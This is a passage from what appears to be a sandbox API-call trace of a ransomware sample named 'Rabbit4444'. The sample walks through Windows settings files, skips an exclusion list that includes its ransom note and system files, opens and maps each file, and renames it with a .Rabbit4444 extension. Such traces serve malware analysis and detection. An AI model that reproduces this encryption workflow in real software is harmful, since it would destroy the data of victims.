(lpBaseAddress=0x70000) returned 1 [0058.131] CloseHandle (hObject=0x298) returned 1 [0058.131] CloseHandle (hObject=0x278) returned 1 [0058.131] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms.Rabbit4444") returned 186 [0058.131] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_picturepassword.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PicturePassword.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_picturepassword.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.132] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dc3a455, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3dc3a455, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", cAlternateFileName="AA3171~1.SET")) returned 1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2=".") returned 1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="..") returned 1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="windows") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="boot") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.132] lstrcmpiW (lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.132] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_PINPassword.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_PINPassword.settingcontent-ms") returned="AAA_SystemSettings_Users_PINPassword.settingcontent-ms" [0058.132] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PINPassword.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.133] lstrlenW (lpString="AAA_SystemSettings_Users_PINPassword.settingcontent-ms") returned 54 [0058.133] lstrlenW (lpString="Rabbit4444") returned 10 [0058.133] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.133] lstrlenW (lpString=".dll") returned 4 [0058.133] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.133] lstrlenW (lpString=".lnk") returned 4 [0058.133] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.133] lstrlenW (lpString=".ini") returned 4 [0058.133] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.133] lstrlenW (lpString=".sys") returned 4 [0058.133] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PINPassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_pinpassword.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.133] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.133] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14944402998) returned 1 [0058.133] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1207) returned 1 [0058.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0058.133] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.134] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.135] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.136] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14944655107) returned 1 [0058.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0058.136] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.136] CloseHandle (hObject=0x298) returned 1 [0058.136] CloseHandle (hObject=0x278) returned 1 [0058.136] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PINPassword.settingcontent-ms.Rabbit4444") returned 182 [0058.136] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PINPassword.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_pinpassword.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_PINPassword.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_pinpassword.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.137] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0fef6a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3e0fef6a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", cAlternateFileName="AA1454~1.SET")) returned 1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2=".") returned 1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="..") returned 1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="windows") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="boot") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.137] lstrcmpiW (lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.137] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms") returned="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms" [0058.137] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.138] lstrlenW (lpString="AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms") returned 66 [0058.138] lstrlenW (lpString="Rabbit4444") returned 10 [0058.138] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.138] lstrlenW (lpString=".dll") returned 4 [0058.138] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.138] lstrlenW (lpString=".lnk") returned 4 [0058.138] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.138] lstrlenW (lpString=".ini") returned 4 [0058.138] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.138] lstrlenW (lpString=".sys") returned 4 [0058.138] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_singlesignonaccountlist.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.138] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.138] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14944912634) returned 1 [0058.138] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1277) returned 1 [0058.138] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0058.139] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.140] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.141] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14945154042) returned 1 [0058.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.141] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0058.141] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.141] CloseHandle (hObject=0x298) returned 1 [0058.141] CloseHandle (hObject=0x278) returned 1 [0058.141] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms.Rabbit4444") returned 194 [0058.141] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_singlesignonaccountlist.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Users_SingleSignOnAccountList.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_users_singlesignonaccountlist.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.142] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e315102, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3e315102, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", cAlternateFileName="AA5D9F~1.SET")) returned 1 [0058.142] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.142] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.142] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.142] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2=".") returned 1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="..") returned 1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="windows") returned -1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="boot") returned -1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.143] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.143] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms" | out: lpString1="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms") returned="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms" [0058.143] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.143] lstrlenW (lpString="AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms") returned 65 [0058.143] lstrlenW (lpString="Rabbit4444") returned 10 [0058.143] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.143] lstrlenW (lpString=".dll") returned 4 [0058.143] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.143] lstrlenW (lpString=".lnk") returned 4 [0058.143] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.143] lstrlenW (lpString=".ini") returned 4 [0058.143] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.143] lstrlenW (lpString=".sys") returned 4 [0058.143] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.143] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_alttabfilter.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.144] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.144] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14945447875) returned 1 [0058.144] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1272) returned 1 [0058.144] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.144] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0058.144] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.145] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14945694180) returned 1 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0058.146] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.146] CloseHandle (hObject=0x298) returned 1 [0058.146] CloseHandle (hObject=0x278) returned 1 [0058.147] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms.Rabbit4444") returned 193 [0058.147] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_alttabfilter.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_AltTabFilter.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_virtualdesktops_alttabfilter.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.147] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e65c444, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3e65c444, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", cAlternateFileName="AA272F~1.SET")) returned 1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2=".") returned 1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="..") returned 1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="windows") returned -1 [0058.147] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.148] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.148] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="boot") returned -1 [0058.148] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.148] lstrcmpiW (lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.148] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms" | out: lpString1="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms") returned="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms" [0058.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.148] lstrlenW (lpString="AAA_SystemSettings_VirtualDesktops_TaskbarFilter.settingcontent-ms") returned 66 [0058.148] lstrlenW (lpString="Rabbit4444") returned 10 [0058.148] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.148] lstrlenW (lpString=".dll") returned 4 [0058.148] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.148] lstrlenW (lpString=".lnk") returned 4 [0058.148] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.148] lstrlenW (lpString=".ini") returned 4 [0058.148] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.148] lstrlenW (lpString=".sys") returned 4 [0058.148] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.148] CreateFileW 